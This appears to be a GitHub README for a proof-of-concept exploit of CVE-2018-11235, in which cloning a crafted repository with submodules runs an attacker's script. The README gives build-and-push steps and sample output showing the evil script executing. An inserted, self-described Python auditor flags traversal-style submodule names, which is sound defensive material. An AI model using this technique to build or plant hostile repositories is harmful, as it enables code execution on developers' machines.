PoC exploit for CVE-2018-11235 allowing RCE on git clone --recurse-submodules
.gitignore  | PoC for CVE-2018-11235            | May 30, 2018
README.md   | Works with older versions of git  | Jun 3, 2018
build.sh    | Works with older versions of git  | Jun 3, 2018
evil.sh     | PoC for CVE-2018-11235            | May 30, 2018

README.md

PoC exploit for CVE-2018-11235

GitHub is not allowing me to push a repository exploiting the vulnerability (good point for them), so you will have to build it yourself by running the build.sh script.

Then, push the repository somewhere. When you clone it with the --recurse-submodules flag, the evil script is executed:

$ git clone --recurse-submodules repo dest_dir
Cloning into 'dest_dir'...
done.
Submodule 'Spoon-Knife' (https://github.com/octocat/Spoon-Knife) registered for path 'Spoon-Knife'
Submodule '../../modules/evil' (https://github.com/octocat/Spoon-Knife) registered for path 'evil'
Cloning into '/snip/dest_dir/Spoon-Knife'...
Submodule path 'Spoon-Knife': checked out 'd0dd1f61b33d64e29d8bc1372a94ef6a2fee76a9'

Here is your hostname: snip

Submodule path 'evil': checked out 'd0dd1f61b33d64e29d8bc1372a94ef6a2fee76a9'
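
The clone output above contains the sign a defender can check for before cloning recursively: a submodule registered under the name '../../modules/evil'. The following Python audit of .gitmodules content is an added example, not part of this repository or of git. The rule it applies (flag an empty name or any name with '..' as a path component) is this example's assumption about what a safe name looks like, and the sample content is constructed from the two names in the output above.

```python
import re

# Matches a section header such as: [submodule "name"]
SECTION_RE = re.compile(r'^\s*\[submodule\s+"((?:[^"\\]|\\.)*)"\]\s*$')


def submodule_names(gitmodules_text):
    """Return the submodule names declared in .gitmodules content."""
    names = []
    for line in gitmodules_text.splitlines():
        m = SECTION_RE.match(line)
        if m:
            # Undo git-config escaping of \" and \\ inside the quoted name.
            names.append(re.sub(r'\\(.)', r'\1', m.group(1)))
    return names


def is_suspicious(name):
    """True if the name is empty or has '..' as a path component.

    Both '/' and '\\' are treated as separators (assumption of this example).
    """
    if not name:
        return True
    return ".." in re.split(r'[/\\]', name)


def audit(gitmodules_text):
    """Return the declared submodule names that look like path traversal."""
    return [n for n in submodule_names(gitmodules_text) if is_suspicious(n)]


# Constructed sample, built from the two submodule names in the output above.
SAMPLE = '''\
[submodule "Spoon-Knife"]
\tpath = Spoon-Knife
\turl = https://github.com/octocat/Spoon-Knife
[submodule "../../modules/evil"]
\tpath = evil
\turl = https://github.com/octocat/Spoon-Knife
'''

if __name__ == "__main__":
    for name in audit(SAMPLE):
        print("suspicious submodule name:", name)
```

Run it against the .gitmodules file of a repository fetched without --recurse-submodules, before initializing any submodules.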

Acknowledgements

Code derived from @peff's git patch (look for the t/t7415-submodule-names.sh test file).

As such, this repository is published under the GNU General Public License version 2.

Additional fix for older versions of git courtesy of @atorralba (details in this post).